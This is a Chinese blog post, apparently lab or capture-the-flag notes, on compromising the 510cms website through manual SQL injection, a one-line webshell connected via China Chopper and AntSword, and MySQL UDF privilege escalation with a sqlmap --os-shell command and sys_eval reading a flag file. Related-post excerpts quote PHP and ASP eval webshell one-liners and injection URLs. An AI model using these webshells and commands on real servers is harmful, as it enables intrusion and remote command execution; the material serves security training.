510cms使用手工注入挂下一句话木马 中国菜刀 蚁剑 挂马连接510cms网站 分别使用navicat和sqlmap进行udf提权

已于 2022-04-12 16:31:15 修改
阅读量544 收藏
点赞数 1
文章标签: windows sql
于 2022-04-12 16:29:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanghao200108/article/details/124127485
版权

在这里插入图片描述
我们知道此处有注入 使用order by 确定他的字段值
在这里插入图片描述
在这里插入图片描述
order by 得出 字段值是7
在这里插入图片描述判断出来回显位数是4
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
Select version()
Select sys_eval(‘cat/flag。txt’)
在这里插入图片描述
sqlmap -d “mysql://root:root@159.75.16.25:3309/mysql” --os-shell

在这里插入图片描述

记录笔记
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
510cms企业网站系统
04-30
510cms企业网站系统源码,以PHP+MYSQL+smarty开发的企业网站,可供大家学习交流。 mysql需自己导入没有写安装程序! 后台地址为admin/login.php 账号和密码都为admin
web安全基础--一句话木马笔记
m0_57291352的博客
05-04 944
课程:https://www.bilibili.com/video/BV1VA411u7Tg?p=7 一句话木马 可执行脚本文件 可以是很多种语言php、jsp等等 需要满足三个条件:木马能成功上传到服务器、我们知道木马上传到服务器的路径、上传的木马能被解析执行。 例如 <?php @eval($_POST['cmd']);?> @是不报错的意思 以post方法获取cmd变量 eval()将括号里的按php代码执行 例如,传入cmd=phpinfo();,那么最后执行的就是<?php @
利用网站上传漏洞使用一句话木马控制服务器
weixin_33962621的博客
06-18 1713
一句话木马 常用于php、asp、aspx php <?php echo shell_exec($_GET['cmd']);?> asp <%execute(request("value"))%> aspx <%@ Page Language="Jscript"%> <%eval(Request.Item["value"...
墨者学院-CMS系统漏洞分析溯源(第3题)
ploto_cs的博客
10-09 524
一.漏洞描述 在用户注册或者修改个人资料中,我们可以注入一句话到数据库中,拿到shell 二.影响版本 新云CMS 4.0.0 SP1 三.漏洞复现 1.使用对域名进行探测 登录网址为http://219.153.49.228/login.asp 2.注册用户 在“密码问题”插入一句话木马 一句话木马为: <% execute request(“a”)%>” 经过Erlang 中文简体字 GB2312 转 unicode 转换来的 ┼攠數畣整爠煥敵瑳∨≡┩愾 3.检查木马是否上传成功
Web安全-一句话木马
热门推荐
道阻且长,行则将至。
05-08 30万+
在很多的渗透过程中,渗透人员会上传一句话木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?
mysql_mysql和matlab连接使用_MYSQL_
09-29
mysql-connector-java-5.1.9
Windows7下安装使用MySQL8.0.16修改密码、连接Navicat问题
09-09
主要介绍了Windows7下安装使用MySQL8.0.16修改密码、连接Navicat问题,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
详解使用navicat连接远程linux mysql数据库出现10061未知故障
09-09
主要介绍了navicat连接远程linux mysql数据库出现10061未知故障,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
MySQL数据库安装和Navicat for MySQL配合使用教程
09-09
MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下公司。这篇文章主要介绍了MySQL数据库安装和Navicat for MySQL配合使用,需要的朋友可以参考下
Python-Django框架开发CMS 使用本地mysql开发,可以直接运行,
10-09
针对内容管理系统(content management system,CMS)要求,通过对管理新闻发布的过程和数据分析,设计如下所示的关系模型: 1.用户(用户编号,用户名,密码,手机号,是否是管理员标识) 2.栏目(栏目编号,栏目...
小程序平台系统CMS源码一键生成带数据带文档
06-21
小程序平台系统CMS源码,可进行OEM代理招商,无需域名授权,里面附带多套小程序原生代码,带数据带文档
后台登录密码绕过+sql注入+一句话木马 实验演示(盾灵)
hxxjxw的博客
07-09 9879
环境 Windows Server 2008(虚拟机) 安装phpStudy,安装dunling 盾灵投稿系统 dunling是一个CMS在线内容管理器 dirb是Kali内置的一个基于字典的Web目录扫描工具,用来爆破目录的 假设已经知道管理员的登陆用户名是admin 实验演示 ①在Windows Server 2008中安装phpStudy,关闭防火墙 下载盾灵...
渗透测试-CMS网站数据库备份漏洞
道阻且长,行则将至。
08-09 1626
背景环境 背景介绍 安全工程师"墨者"的朋友搭建一个emlog个人博客系统,为了确保该系统的安全性,请你检测该系统是否存在安全漏洞。 实训目标 1、了解验证码绕过的相关知识; 2、了解后台地址扫描及其他相关漏洞资料; 3、了解后台常用账户密码的利用方式; 解题方向 进入后台,找到后台中可利用的地方getshell。 攻击过程 墨者学院在线靶机(动态地址): http://219.153.49.2...
php一句话木马调用cmd命令,一句话木马(webshell)是如何执行命令的
weixin_39617669的博客
03-09 2090
在很多的渗透过程中,渗透人员会上传一句话木马(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是如何执行的呢,下面我们就对webshell进行一个简单的分析。首先我们先看一个原始而又简单的php一句话木马。看到这里不得不赞美前辈的智慧。对于一个稍微懂一些php的人而言,或者初级的安全爱好者,或者脚本小子而言,看到的第一...
利用Art2008cms漏洞渗透某站点
最新发布
weixin_44023460的博客
07-20 122
单击“基本设置”-“添加文章”,在文章添加页面中单击“插入FLV视频”,选择一个已经更名为mdb的Webshell上传,如图2所示,选择文件后单击开始上传,上传完毕后会自动显示文件上传后的详细地址“/uploadfile/Media/201106/2011061515303758472.mdb”,记下该地址,留作后用。数据库恢复成功后,由于用来恢复的数据库是Webshell,非真实的数据库文件,因此当数据库恢复成功后,后台管理会保错,导致后台无法管理,网站也无法正常访问,如图5所示。CurrPath=…
510cms进行渗透测试,找到其中的3个flag
Alashan12的博客
04-08 4228
拿到网站 简单观察后发现url区域存在传参 简单测试找到存在注入的界面(此网站多处网址存在注入) 这里我们通过输入一个单引号找到“企业介绍”—>“企业文化”界面存在注入 我们针对此界面(180.76.226.182/about.php?listid=6)使用sqlmap进行爆破 sqlmap -u 180.76.226.182/about.php?listid=6 --current-db 爆当前数据库名 得到数据库名为“510cms” 然后指定该数据库...
sql手注udf提权
m0_53042636的博客
04-12 985
1、510cms使用手工注入挂下一句话木马。操作步骤配截图。 http://159.75.16.25:88/about.php?listid=6 正常页面 http://159.75.16.25:88/about.php?listid=6‘ 异常页面 http://159.75.16.25:88/about.php?listid=6 and 1=1 – + 正常页面 http://159.75.16.25:88/about.php?listid=6 and 1=2 – + 异常页面 可以判断出为整形注入
SQL注入之Bool盲注(510cms
qq_45775897的博客
01-05 2847
SQL注入之get可以参考: https://blog.csdn.net/qq_45775897/article/details/122332051 一、查找是否存在SQL注入注入点) 以510企业网站为例: 这里以漏洞参数id为例 用?id=1和id=1'进行测试,前提能够正常显示。 在?id=1后面加上and 1=1两个结果都是真的,所以正常输出; 后面加上and 1=2如果正常输出,说明前后都是真的,则表示是字符型。反之是数值型 eg: http://IP地址(域名)/news.php?cid=&
使用pyqt5开发navicat中双击连接打开数据库和打开连接功能
03-31
以下是使用PyQt5开发Navicat中双击连接打开数据库和打开连接功能的示例代码: ```python from PyQt5.QtWidgets import QApplication, QMainWindow, QTreeView, QMessageBox from PyQt5.QtGui import QIcon from PyQt5.QtCore import Qt from PyQt5.QtSql import QSqlDatabase, QSqlQueryModel class Navicat(QMainWindow): def __init__(self): super().__init__() # 设置窗口标题和图标 self.setWindowTitle('Navicat') self.setWindowIcon(QIcon('icon.png')) # 创建树形视图并设置其属性 self.treeView = QTreeView(self) self.treeView.setRootIsDecorated(False) self.treeView.setAlternatingRowColors(True) # 连接数据库 self.db = QSqlDatabase.addDatabase('QSQLITE') self.db.setDatabaseName('test.db') if not self.db.open(): QMessageBox.critical(self, 'Error', self.db.lastError().text()) # 创建查询模型并设置其属性 self.model = QSqlQueryModel(self) self.model.setQuery('SELECT name FROM sqlite_master WHERE type=\'table\'') self.treeView.setModel(self.model) # 双击树形视图项打开数据库表 self.treeView.doubleClicked.connect(self.openTable) # 设置主窗口布局 self.setCentralWidget(self.treeView) # 打开数据库表 def openTable(self, index): tableName = self.model.record(index.row()).value('name') if not self.db.isOpen(): QMessageBox.critical(self, 'Error', 'Database is not open.') return if not self.db.tables().contains(tableName): QMessageBox.critical(self, 'Error', 'Table not found.') return query = QSqlQueryModel(self) query.setQuery('SELECT * FROM ' + tableName) view = QTableView() view.setModel(query) view.setWindowTitle(tableName) view.show() if __name__ == '__main__': app = QApplication([]) navicat = Navicat() navicat.show() app.exec_() ``` 在上面的示例代码中,我们创建了一个名为Navicat的主窗口,并在其中添加了一个树形视图。我们使用QSqlQueryModel查询数据库中的所有表,并将其设置为树形视图的模型。我们还连接了树形视图的doubleClicked信号槽,以便在双击树形视图项时打开数据库表。 在打开数据库表的openTable方法中,我们使用QSqlQueryModel查询数据库表中的所有数据,并将其设置为QTableView的模型。我们还将QTableView的标题设置为数据库表名,并在打开QTableView之前显示它。 请注意,在打开数据库表之前,我们还检查了数据库是否已打开,并检查了所需的表是否存在。如果出现任何错误,我们将显示一个错误消息框。 这就是使用PyQt5开发Navicat中双击连接打开数据库和打开连接功能的示例代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值